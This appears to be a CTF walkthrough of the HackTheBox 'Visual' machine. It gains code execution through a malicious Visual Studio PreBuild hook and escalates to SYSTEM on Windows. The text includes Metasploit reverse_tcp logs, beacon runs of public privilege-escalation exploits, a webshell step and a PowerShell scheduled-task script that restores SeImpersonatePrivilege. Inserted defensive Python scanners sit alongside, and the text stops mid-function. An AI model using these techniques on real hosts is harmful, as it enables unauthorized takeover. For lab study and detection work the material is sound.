Visual is a Medium-difficulty machine on HackTheBox. It presents a scenario in which a host is taken over through a malicious Visual Studio project, and it is also a good choice for learning Windows privilege escalation.

Box information

Knowledge needed to complete the box:

  • C# and .NET
  • Setting up a Git server
  • Windows privilege escalation

Reconnaissance

Port scanning

kali@kali ~/D/H/M/Visual> nmap -p- -n --min-rate 3000 -T4 10.10.11.234
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-25 23:44 CST
Nmap scan report for 10.10.11.234
Host is up (0.26s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 78.79 seconds
kali@kali ~/D/H/M/Visual> sudo nmap -Pn -p- -n --min-rate 3000 -T4 -sU 10.10.11.234
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-25 23:46 CST
Nmap scan report for 10.10.11.234
Host is up.
All 65535 scanned ports on 10.10.11.234 are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 44.60 seconds

Both the TCP and the UDP scan show only port 80 open.

Identifying the vulnerability

Opening the web interface, the page says it accepts a Git repository URL (.NET 6.0 C# projects are supported; the repository must contain a .sln file) and the target will compile it automatically.

This scenario immediately brings to mind malicious Visual Studio project phishing; I had seen related posts on Twitter before.

Initial foothold

Local Git service

I used Gitea for the local Git service. Following the Installation with Docker chapter of the Gitea manual, a Gitea instance is easy to set up.

Create a new docker-compose.yml with the following content:

version: "3"

networks:
  gitea:
    external: false

services:
  server:
    image: gitea/gitea:latest
    container_name: gitea
    environment:
      - USER_UID=1000
      - USER_GID=1000
    restart: always
    networks:
      - gitea
    volumes:
      - ./gitea:/data
      - /etc/timezone:/etc/timezone:ro
      - /etc/localtime:/etc/localtime:ro
    ports:
      - "80:3000"

The official manual defaults to port 3000; I changed it to port 80.

Start the service with docker-compose: sudo docker-compose up

After it runs, the Gitea directory layout looks like this:

[4.0K]  .
├── [ 383]  docker-compose.yml
└── [4.0K]  gitea
    ├── [4.0K]  git
    ├── [4.0K]  gitea
    └── [4.0K]  ssh

5 directories, 1 file

Visiting port 80 locally brings up Gitea's initial setup page.

After setup, the first user to register is the system administrator by default. Create a new Git repository; note that it must not be set to private.

Submit the new repository URL to the target for compilation. The target server's request shows up in the Gitea logs, but the build result reports [-] The repository doesn't contain a .sln file or the URL submitted is invalid.

This confirms that the target server really does fetch the local Git project and checks whether the repository contains a .sln file.

Malicious Visual Studio project

At first I didn't intend to create the project in a local Visual Studio; I assumed there would already be a mature PoC on GitHub. ╮( ̄▽ ̄”)╭

After some searching I did find some information:

The second link is obviously a project created for solving this HTB box. At that point I wanted to do it myself; using a ready-made payload felt pointless.

Creating the C# project locally

Create a new C# console project:

Set the Pre-Build command:

After setting the command, the project file ConsoleApp1.csproj looks like this:

<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>

  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="notepad.exe" />
  </Target>

</Project>

Clicking the build button locally does indeed launch Notepad.
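The build service on this box compiles whatever repository it is handed, and the ConsoleApp1.csproj above shows why that is dangerous: MSBuild runs the Command of any Exec task (and the contents of a PreBuildEvent or PostBuildEvent property) with the build user's privileges, and the same applies to Directory.Build.targets files and inline UsingTask code that the SDK picks up without any reference in the .csproj. The Python scanner below is an added example, not code from the original post or from the box; it is the kind of pre-flight check a build service should run on an untrusted repository before calling dotnet build. It parses every .csproj/.props/.targets file under a directory, reports Exec tasks, build-event properties, inline tasks and non-SDK imports, and refuses the build if anything executes at build time. The three-project repository it writes to a temporary directory is constructed for the demonstration.

```python
from __future__ import annotations

import os
import tempfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# MSBuild file types that can carry build-time logic; Directory.Build.props/.targets
# are imported implicitly by the SDK, so they are scanned too.
PROJECT_EXTENSIONS = (".csproj", ".vbproj", ".fsproj", ".props", ".targets")
# Property names that Microsoft.Common.targets hands to an Exec task around the build.
EVENT_PROPERTIES = {"PreBuildEvent", "PostBuildEvent"}
# Finding kinds that run a process (or compile inline code) during the build.
BLOCKING_KINDS = {"exec-task", "build-event", "inline-task", "parse-error"}


@dataclass
class Finding:
    file: str
    kind: str    # exec-task | build-event | inline-task | import | parse-error
    detail: str


def _local(tag: str) -> str:
    """Strip the XML namespace so old-style ({...msbuild/2003}Exec) and SDK-style tags compare alike."""
    return tag.rsplit("}", 1)[-1]


def scan_project_file(path: str) -> list[Finding]:
    """Return every build-time execution vector found in one MSBuild file."""
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError as exc:
        return [Finding(path, "parse-error", str(exc))]
    findings: list[Finding] = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name == "Exec":                       # <Exec Command="..."/> inside any <Target>
            findings.append(Finding(path, "exec-task", (elem.get("Command") or "").strip()))
        elif name in EVENT_PROPERTIES:           # <PreBuildEvent>...</PreBuildEvent>
            findings.append(Finding(path, "build-event", (elem.text or "").strip()))
        elif name == "UsingTask" and elem.get("TaskFactory"):   # inline C# compiled at build time
            findings.append(Finding(path, "inline-task", f"{elem.get('TaskName')} via {elem.get('TaskFactory')}"))
        elif name == "Import":                   # pulls in another file with its own targets
            project = elem.get("Project") or ""
            if not project.startswith("$("):     # $(MSBuildToolsPath)-style imports are the SDK's own
                findings.append(Finding(path, "import", project))
    return findings


def scan_repository(repo_dir: str) -> list[Finding]:
    """Walk a checked-out repository and scan every MSBuild file in it."""
    findings: list[Finding] = []
    for dirpath, dirnames, filenames in os.walk(repo_dir):
        dirnames.sort()                          # deterministic order across platforms
        for fn in sorted(filenames):
            if fn.lower().endswith(PROJECT_EXTENSIONS):
                findings.extend(scan_project_file(os.path.join(dirpath, fn)))
    return sorted(findings, key=lambda f: f.file)


def is_safe_to_build(repo_dir: str) -> bool:
    """Policy for an automated build service: refuse anything that executes during the build."""
    return not any(f.kind in BLOCKING_KINDS for f in scan_repository(repo_dir))


# --- constructed sample repository (not the box's repository) ---------------------------
MALICIOUS_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
  </PropertyGroup>
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="notepad.exe" />
  </Target>
</Project>
"""

# Directory.Build.targets is imported automatically by the SDK, so a build event hidden
# here fires for every project in the tree without touching any .csproj.
ROOT_TARGETS = """<Project>
  <PropertyGroup>
    <PostBuildEvent>echo build finished</PostBuildEvent>
  </PropertyGroup>
</Project>
"""

CLEAN_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <TargetFramework>net6.0</TargetFramework>
  </PropertyGroup>
</Project>
"""


def build_sample_repo() -> str:
    """Write the constructed repository to a temporary directory and return its path."""
    repo = tempfile.mkdtemp(prefix="csproj-scan-")
    layout = {
        os.path.join("ConsoleApp1", "ConsoleApp1.csproj"): MALICIOUS_CSPROJ,
        "Directory.Build.targets": ROOT_TARGETS,
        os.path.join("Library", "Library.csproj"): CLEAN_CSPROJ,
    }
    for rel, content in layout.items():
        full = os.path.join(repo, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return repo


if __name__ == "__main__":
    sample = build_sample_repo()
    for finding in scan_repository(sample):
        print(f"{finding.kind:12} {os.path.relpath(finding.file, sample)}: {finding.detail}")
    print("safe to build:", is_safe_to_build(sample))
```

Running it prints one line per finding and the verdict for the sample tree; only the Library sub-tree passes on its own. A scanner like this is a filter, not a sandbox: a NuGet package can ship its own .targets file and a custom SDK is resolved from a feed, so the build itself should still run in a throwaway, network-restricted environment, which is exactly what this box does not do.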

Submitting to the target for compilation

Push the files to the Gitea service:

git init -b main
git remote add origin http://10.10.14.101/a/a1.git
git pull
git status
git add *
git commit -m init
git push --set-upstream -f origin main

Submitting to the target server again, the build times out:

There are many possible causes for a build timeout; the Notepad process may have interfered with the build.

After commenting out the PreBuild configuration in /ConsoleApp1.csproj and resubmitting, the build fails with an error:

Looking at the error message, the failure point is that the directory C:\Program Files (x86)\Microsoft Visual Studio\Shared\NuGetPackages cannot be found.

Error log
"C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.sln" (default target) (1) ->
"C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj" (default target) (2) ->
(ResolvePackageAssets target) ->
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018: The "ResolvePackageAssets" task failed unexpectedly. [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018: NuGet.Packaging.Core.PackagingException: Unable to find fallback package folder 'C:\Program Files (x86)\Microsoft Visual Studio\Shared\NuGetPackages'. [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018: at NuGet.Packaging.FallbackPackagePathResolver..ctor(String userPackageFolder, IEnumerable`1 fallbackPackageFolders) [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018: at Microsoft.NET.Build.Tasks.NuGetPackageResolver.CreateResolver(IEnumerable`1 packageFolders) [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018: at Microsoft.NET.Build.Tasks.NuGetPackageResolver.CreateResolver(LockFile lockFile) [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018: at Microsoft.NET.Build.Tasks.ResolvePackageAssets.CacheWriter..ctor(ResolvePackageAssets task) [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018: at Microsoft.NET.Build.Tasks.ResolvePackageAssets.CacheReader.CreateReaderFromDisk(ResolvePackageAssets task, Byte[] settingsHash) [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018: at Microsoft.NET.Build.Tasks.ResolvePackageAssets.CacheReader..ctor(ResolvePackageAssets task) [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018: at Microsoft.NET.Build.Tasks.ResolvePackageAssets.ReadItemGroups() [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018: at Microsoft.NET.Build.Tasks.ResolvePackageAssets.ExecuteCore() [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018: at Microsoft.NET.Build.Tasks.TaskBase.Execute() [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018: at Microsoft.Build.BackEnd.TaskExecutionHost.Microsoft.Build.BackEnd.ITaskExecutionHost.Execute() [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018: at Microsoft.Build.BackEnd.TaskBuilder.<ExecuteInstantiatedTask>d__26.MoveNext() [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]

0 Warning(s)
1 Error(s)

Time Elapsed 00:00:02.06

After removing the NuGet-related configuration in /obj/project.assets.json and resubmitting, the build succeeds:

Adjusting the payload

After restoring the PreBuild configuration in /ConsoleApp1.csproj and resubmitting, it times out again... ╮( ̄▽ ̄”)╭

Changing the payload to an msfvenom backdoor gives a shell directly...

User privileges

The session obtained through Metasploit runs as the user enox, which gives the user flag.

During privilege escalation I made a lot of aimless attempts; to be honest, Windows privilege escalation was a complete fog to me from the start.

I tried the following:

  • winPEAS
  • Metasploit's local_exploit_suggester

Failed attempts with local_exploit_suggester

local_exploit_suggester output
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.11.234 - Collecting local exploits for x64/windows...
[*] 10.10.11.234 - 189 exploit checks are being tried...
[+] 10.10.11.234 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2022_21882_win32k: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 45 / 45
[*] 10.10.11.234 - Valid modules for session 2:
Privilege escalation attempts
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Attempting to PrivEsc on VISUAL via session ID: 2
[-] Exploit aborted due to failure: bad-config: Payload arch must match target arch
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > set -g payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Attempting to PrivEsc on VISUAL via session ID: 2
[*] Running Exploit on VISUAL
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > use exploit/windows/local/cve_2022_21882_win32k
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2022_21882_win32k) > run

[*] Started reverse TCP handler on 10.10.14.46:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Launching msiexec to host the DLL...
[+] Process 1732 launched.
[*] Reflectively injecting the DLL into 1732...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/cve_2022_21882_win32k) > use exploit/windows/local/cve_2022_21999_spoolfool_privesc
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2022_21999_spoolfool_privesc) > run

[*] Started reverse TCP handler on 10.10.14.46:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Send timed out
[-] run: Interrupted
msf6 exploit(windows/local/cve_2022_21999_spoolfool_privesc) > run

[*] Started reverse TCP handler on 10.10.14.46:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Send timed out
[-] run: Interrupted
msf6 exploit(windows/local/cve_2022_21999_spoolfool_privesc) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

winPEAS attempts

Potential vulnerabilities reported by winPEAS
 [?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson)
[*] OS Version: 1809 (17763)
[*] Enumerating installed KBs...
[!] CVE-2019-0836 : VULNERABLE
[>] https://exploit-db.com/exploits/46718
[>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/

[!] CVE-2019-0841 : VULNERABLE
[>] https://github.com/rogue-kdc/CVE-2019-0841
[>] https://rastamouse.me/tags/cve-2019-0841/

[!] CVE-2019-1064 : VULNERABLE
[>] https://www.rythmstick.net/posts/cve-2019-1064/

[!] CVE-2019-1130 : VULNERABLE
[>] https://github.com/S3cur3Th1sSh1t/SharpByeBear

[!] CVE-2019-1253 : VULNERABLE
[>] https://github.com/padovah4ck/CVE-2019-1253
[>] https://github.com/sgabe/CVE-2019-1253

[!] CVE-2019-1315 : VULNERABLE
[>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html

[!] CVE-2019-1385 : VULNERABLE
[>] https://www.youtube.com/watch?v=K6gHnr-VkAg

[!] CVE-2019-1388 : VULNERABLE
[>] https://github.com/jas502n/CVE-2019-1388

[!] CVE-2019-1405 : VULNERABLE
[>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
[>] https://github.com/apt69/COMahawk

[!] CVE-2020-0668 : VULNERABLE
[>] https://github.com/itm4n/SysTracingPoc

[!] CVE-2020-0683 : VULNERABLE
[>] https://github.com/padovah4ck/CVE-2020-0683
[>] https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/cve-2020-0683.ps1

[!] CVE-2020-1013 : VULNERABLE
[>] https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/

[*] Finished. Found 12 potential vulnerabilities.

Attempt log
  [?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson)
[*] OS Version: 1809 (17763)
[*] Enumerating installed KBs...
[!] CVE-2019-0836 : VULNERABLE
[>] https://exploit-db.com/exploits/46718
[>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/

beacon> run C:\Users\enox\desktop\PoC_LUAFV_PostReadWriteCallback_EoP.exe
[*] Tasked beacon to run: C:\Users\enox\desktop\PoC_LUAFV_PostReadWriteCallback_EoP.exe
[+] host called home, sent: 79 bytes
[+] received output:
Base Path: C:\ProgramData\luafv_c9f12450-7f23-467a-a039-cab4009e1a9a
Trying to map C:\Windows\system32\license.rtf R/W
NtApiDotNet.NtException: (0xC0000022) - {Access Denied}
A process has requested access to an object, but has not been granted those access rights.
at NtApiDotNet.NtObjectUtils.ToNtException(NtStatus status, Boolean throw_on_error)
at NtApiDotNet.NtFile.DoLinkRename(FileInformationClass file_info, String linkname, NtFile root, Boolean replace_if_exists)
at NtApiDotNet.NtFile.CreateHardlink(String path, String linkname)
at PoC_LUAFV_PostReadWriteCallback_EoP.Program.RemapFileAsRW()
at PoC_LUAFV_PostReadWriteCallback_EoP.Program.Main(String[] args)



[!] CVE-2019-0841 : VULNERABLE
[>] https://github.com/rogue-kdc/CVE-2019-0841
[>] https://rastamouse.me/tags/cve-2019-0841/

beacon> run C:\Users\enox\desktop\CVE_2019-0841.exe
[*] Tasked beacon to run: C:\Users\enox\desktop\CVE_2019-0841.exe
[+] host called home, sent: 57 bytes
[+] received output:
# Privileged DACL Overwrite EoP
# CVE: CVE-2019-0841
# Exploit Author: Nabeel Ahmed (@rogue_kdc)
# Tested on: Microsoft Windows 10 x32 & x64
# Category: Local
-------------------------------------------------
[+] Usage: exploit.exe <path to file to takeover>
[+] (E.g., exploit.exe C:\Windows\win.ini
-------------------------------------------------

beacon> run C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\Desktop\root.txt
[*] Tasked beacon to run: C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\Desktop\root.txt
[+] host called home, sent: 97 bytes
[+] received output:
[+] You don't have 'Modify/Write' privileges on this file ...

beacon> run C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\
[*] Tasked beacon to run: C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\
[+] host called home, sent: 81 bytes
[+] received output:
[+] Something went wrong: No such file or directory

beacon> run C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\Desktop\root.txt
[*] Tasked beacon to run: C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\Desktop\root.txt
[+] host called home, sent: 97 bytes
[+] received output:
[+] You don't have 'Modify/Write' privileges on this file ...

beacon> run C:\Users\enox\Desktop\CVE_2019-0841.exe C:\Windows\System32\config\sam
[*] Tasked beacon to run: C:\Users\enox\Desktop\CVE_2019-0841.exe C:\Windows\System32\config\sam
[+] host called home, sent: 88 bytes
[+] received output:
[+] You don't have 'Modify/Write' privileges on this file ...

beacon> run C:\Users\enox\Desktop\CVE_2019-0841.exe C:\Windows\System32\config\system
[*] Tasked beacon to run: C:\Users\enox\Desktop\CVE_2019-0841.exe C:\Windows\System32\config\system
[+] host called home, sent: 91 bytes
[+] received output:
[+] You don't have 'Modify/Write' privileges on this file ...


[!] CVE-2019-1064 : VULNERABLE
[>] https://www.rythmstick.net/posts/cve-2019-1064/

beacon> run C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Users\Administrator\
[*] Tasked beacon to run: C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Users\Administrator\
[+] host called home, sent: 83 bytes
[+] received output:
[+] C:\Users\Administrator\ not found

beacon> run C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Windows\System32\config\system
[*] Tasked beacon to run: C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Windows\System32\config\system
[+] host called home, sent: 93 bytes
[+] received output:
[+] C:\Windows\System32\config\system not found

beacon> run C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Windows\System32\config\sam
[*] Tasked beacon to run: C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Windows\System32\config\sam
[+] host called home, sent: 90 bytes
[+] received output:
[+] C:\Windows\System32\config\sam not found


[!] CVE-2019-1130 : VULNERABLE
[>] https://github.com/S3cur3Th1sSh1t/SharpByeBear

[!] CVE-2019-1253 : VULNERABLE
[>] https://github.com/padovah4ck/CVE-2019-1253
[>] https://github.com/sgabe/CVE-2019-1253

[!] CVE-2019-1315 : VULNERABLE
[>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html

[!] CVE-2019-1385 : VULNERABLE
[>] https://www.youtube.com/watch?v=K6gHnr-VkAg

[!] CVE-2019-1388 : VULNERABLE
[>] https://github.com/jas502n/CVE-2019-1388

[!] CVE-2019-1405 : VULNERABLE
[>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
[>] https://github.com/apt69/COMahawk

[!] CVE-2020-0668 : VULNERABLE
[>] https://github.com/itm4n/SysTracingPoc


[!] CVE-2020-0683 : VULNERABLE
[>] https://github.com/padovah4ck/CVE-2020-0683
[>] https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/cve-2020-0683.ps1

PS C:\Users\enox\Desktop> .\MsiExploit.exe C:\Users\Administrator\
.\MsiExploit.exe C:\Users\Administrator\
The Windows Installer Service could not be accessed. This can occur if the Windows Installer is not correctly installed. Contact your support personnel for assistance.
The Windows Installer Service could not be accessed. This can occur if the Windows Installer is not correctly installed. Contact your support personnel for assistance.
This action is only valid for products that are currently installed.

[!] CVE-2020-1013 : VULNERABLE
[>] https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/

PS C:\Users\enox\Desktop> .\WSuspicious.exe
.\WSuspicious.exe
No WSUS Server detected.
Stopping now.
PS C:\Users\enox\Desktop> .\WSuspicious.exe /exe:.\reverse.exe
.\WSuspicious.exe /exe:.\reverse.exe
No WSUS Server detected.
Stopping now.

Thinking it over

After all of the above attempts failed, I started thinking about the privileges of my current user:

C:\Windows\Temp\9b7ed8d62ccca237f8c62c20c52f1b>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

From searching around, I judged that the important privilege here is SeCreateGlobalPrivilege.
Most cases found online have SeImpersonatePrivilege, which is absent here.

I then found the article Give Me Back My Privileges! Please?, whose scenario is very similar to mine.

I took the PowerShell script from it directly to create a scheduled task, but it never ran successfully:

$TaskAction = New-ScheduledTaskAction -Execute "C:\xampp\htdocs\a4445.exe";Register-ScheduledTask -Action $TaskAction -TaskName "SomeTask4";Start-ScheduledTask -TaskName "SomeTask4";Get-ScheduledTaskInfo -TaskName "SomeTask4"

By this point I had already spent a long time on it, so I set myself a deadline: if I hadn't worked it out by a certain time, I would read a writeup.

root privileges

I read this one: https://maddevs.io/writeups/hackthebox-visual/

The approach up to this point is the same. For privilege escalation the writeup mentions a key point: obtaining LOCAL SERVICE privileges through a webshell.

When I reproduced it, after obtaining the webshell I could indeed create the scheduled task, restore SeImpersonatePrivilege, and get SYSTEM.

local service

Generate a webshell with Reverse Shell Generator using the PHP Ivan Sincek option, upload it to C:/xampp/htdocs, and access it from the local environment to get a shell.

The one generated from the PHP pentestmonkey option throws an error when used.

Restoring SeImpersonatePrivilege

This mainly follows Give Me Back My Privileges! Please?. Note that the original payload requests many privileges (the value of $Privs), which made the scheduled task creation fail; after limiting it to just the privileges needed, the task was created successfully.

# Multi-line script
$NName = "SomeTask12";
[System.String[]]$Privs = "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeImpersonatePrivilege";
$TaskPrincipal = New-ScheduledTaskPrincipal -UserId "nt authority\local service" -LogonType ServiceAccount -RequiredPrivilege $Privs;
$TaskAction = New-ScheduledTaskAction -Execute "C:\xampp\htdocs\a4446.exe";
Register-ScheduledTask -Action $TaskAction -TaskName $NName -Principal $TaskPrincipal;
Start-ScheduledTask -TaskName $NName;
Get-ScheduledTaskInfo -TaskName $NName

# One-liner
$NName = "SomeTask13";$cmd = "C:\xampp\htdocs\a.exe";[System.String[]]$Privs = "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeImpersonatePrivilege";$TaskPrincipal = New-ScheduledTaskPrincipal -UserId "nt authority\local service" -LogonType ServiceAccount -RequiredPrivilege $Privs;$TaskAction = New-ScheduledTaskAction -Execute $cmd;Register-ScheduledTask -Action $TaskAction -TaskName $NName -Principal $TaskPrincipal;Start-ScheduledTask -TaskName $NName;Get-ScheduledTaskInfo -TaskName $NName

If the run fails, change the value of $NName, otherwise it will complain that the task name already exists.
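Seen from the defender's side, the scheduled-task trick above leaves a clear trace: with task creation auditing enabled, Windows writes Security event 4698 (A scheduled task was created) and includes the full task definition XML in its Task Content field, so the <Principal> with <RequiredPrivileges> that the script above sets is written straight into the log. The Python detection below is an added example, not part of the original post or of the referenced article. It parses that task XML and flags a task whose principal is LOCAL SERVICE or NETWORK SERVICE and which requests SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, or whose action runs a binary from a web root such as the C:\xampp\htdocs directory used above. The event records it runs over are constructed samples in an evtx-to-JSON style, not logs from the box.

```python
from __future__ import annotations

import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Namespace used by every Task Scheduler task definition.
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Service accounts that normally run with a stripped-down token; a task that re-adds
# privileges to them is the pattern used in the post above. Both the SID and the name
# form appear in task XML, so both are listed.
SERVICE_ACCOUNTS = {
    "S-1-5-19", "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20", "NT AUTHORITY\\NETWORK SERVICE",
}
# Privileges that turn a service token into a stepping stone to SYSTEM.
SENSITIVE_PRIVILEGES = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}
# Path fragments (lower-case) that mean the task's binary was dropped into a web root.
WEB_ROOT_MARKERS = ("\\htdocs\\", "\\inetpub\\", "\\wwwroot\\")


@dataclass
class TaskAlert:
    task_name: str
    created_by: str
    reasons: list[str]


def _text(elem: ET.Element, child_tag: str) -> str:
    child = elem.find(TASK_NS + child_tag)
    return (child.text or "").strip() if child is not None else ""


def analyze_task_xml(task_xml: str) -> list[str]:
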